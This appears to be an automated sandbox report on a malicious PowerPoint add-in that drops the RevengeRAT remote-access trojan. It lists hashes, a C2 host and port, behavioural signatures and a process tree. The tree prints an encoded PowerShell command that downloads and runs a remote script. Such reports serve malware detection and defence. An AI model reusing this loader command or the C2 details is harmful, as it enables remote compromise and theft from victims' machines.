Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-03-2024 08:00

General

  • Target

    Documentacao pax.ppa

  • Size

    88KB

  • MD5

    ff08378dd83e84df74a9ce07f5105aa2

  • SHA1

    2ba229ede6c3b0a53e966d6f491e556b8b9efe72

  • SHA256

    994fbd9bbcb4586bcc97a0c0fb48f08b3af8acac284624c84d2d102fb1f3762e

  • SHA512

    f09ce3a2e8a21979c8d8060ee8206cc6d4146a80176a3f243f35fa0f8f021ec349fb3474ff0635c3543092c34ad6bcb5898895c37d05763f6945fc42fa8ca1fc

  • SSDEEP

    768:0cOoejkNcs+kozxpxWMjcXocyNumLu8J7icjo:0WejkNcsuzxpxWbYT1u

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

craxsrat.ddns.com.br:333

Mutex

27d7e6701f5e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Documentacao pax.ppa"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHQAZQBzAHQAaQBuAGcALQBlAGEAZgAyADgALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9AGIAOAA1AGIANABiADMANAAtADQAZgBiADkALQA0ADgANAAwAC0AYQAxAGQANwAtADMAMgA3AGEAZABlAGIAZQAwAGMANAA0AA0ACgAnACkAOwAgAA0ACgBHAHoATQBJAFQAWgBQAFIAVwBhAFQATQBvAEMAVwBiAGEAUwBNAFcAQgBkAEgASwBhAG8AcgBJAGMAdwBkAFkAbwBpAHoAeQBWAFIAdgBSAEkAUgBNAGYASABLAHoAawBYAEMAcwBwAFcAUwBIAGMAcwBjAEgARwBrAGgAUQBtAFcAVQB6AEsASABEAGgAawBHAHkAbwBMAHMAQwBkAHMAVABpAE0ADQAKAA==""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2328
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Checks processor information in registry
        PID:4580

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

3
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prayixv1.ggz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2328-107-0x00007FFF09930000-0x00007FFF0A3F1000-memory.dmp
    Filesize

    10.8MB

  • memory/2328-106-0x0000028A58920000-0x0000028A589DD000-memory.dmp
    Filesize

    756KB

  • memory/2328-102-0x0000028A71200000-0x0000028A71201000-memory.dmp
    Filesize

    4KB

  • memory/2328-101-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-99-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-97-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-95-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-93-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-90-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-91-0x0000028A71280000-0x0000028A71298000-memory.dmp
    Filesize

    96KB

  • memory/2328-89-0x0000028A71280000-0x0000028A712A0000-memory.dmp
    Filesize

    128KB

  • memory/2328-87-0x0000028A712D0000-0x0000028A712E0000-memory.dmp
    Filesize

    64KB

  • memory/2328-88-0x0000028A712D0000-0x0000028A712E0000-memory.dmp
    Filesize

    64KB

  • memory/2328-86-0x00007FFF09930000-0x00007FFF0A3F1000-memory.dmp
    Filesize

    10.8MB

  • memory/2328-85-0x0000028A71210000-0x0000028A71232000-memory.dmp
    Filesize

    136KB

  • memory/3604-16-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-11-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-19-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-20-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-21-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-23-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-22-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-18-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-32-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-54-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-57-0x00000187C1C80000-0x00000187C2C50000-memory.dmp
    Filesize

    15.8MB

  • memory/3604-62-0x00000187C1C80000-0x00000187C2C50000-memory.dmp
    Filesize

    15.8MB

  • memory/3604-63-0x00000187C1C80000-0x00000187C2C50000-memory.dmp
    Filesize

    15.8MB

  • memory/3604-67-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-68-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-69-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-70-0x00000187C1C80000-0x00000187C2C50000-memory.dmp
    Filesize

    15.8MB

  • memory/3604-71-0x00000187C1C80000-0x00000187C2C50000-memory.dmp
    Filesize

    15.8MB

  • memory/3604-72-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-73-0x00000187C0AE0000-0x00000187C12E0000-memory.dmp
    Filesize

    8.0MB

  • memory/3604-0-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-15-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-14-0x00007FFEF5030000-0x00007FFEF5040000-memory.dmp
    Filesize

    64KB

  • memory/3604-13-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-12-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-17-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-10-0x00007FFEF5030000-0x00007FFEF5040000-memory.dmp
    Filesize

    64KB

  • memory/3604-9-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-6-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-8-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-7-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-2-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-5-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-4-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-121-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-3-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-1-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-120-0x00007FFF371D0000-0x00007FFF373C5000-memory.dmp
    Filesize

    2.0MB

  • memory/3604-119-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-116-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-117-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/3604-118-0x00007FFEF7250000-0x00007FFEF7260000-memory.dmp
    Filesize

    64KB

  • memory/4580-110-0x0000000005B90000-0x0000000006134000-memory.dmp
    Filesize

    5.6MB

  • memory/4580-108-0x0000000074C70000-0x0000000075420000-memory.dmp
    Filesize

    7.7MB

  • memory/4580-103-0x0000000000400000-0x000000000040A000-memory.dmp
    Filesize

    40KB

  • memory/4580-122-0x0000000005740000-0x0000000005750000-memory.dmp
    Filesize

    64KB

  • memory/4580-123-0x0000000006140000-0x00000000061DC000-memory.dmp
    Filesize

    624KB

  • memory/4580-124-0x00000000061E0000-0x0000000006246000-memory.dmp
    Filesize

    408KB

  • memory/4580-125-0x0000000074C70000-0x0000000075420000-memory.dmp
    Filesize

    7.7MB

  • memory/4580-126-0x0000000005740000-0x0000000005750000-memory.dmp
    Filesize

    64KB